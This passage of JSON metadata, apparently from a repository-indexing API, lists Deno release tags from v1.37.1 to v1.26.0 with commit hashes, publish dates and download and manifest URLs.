at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_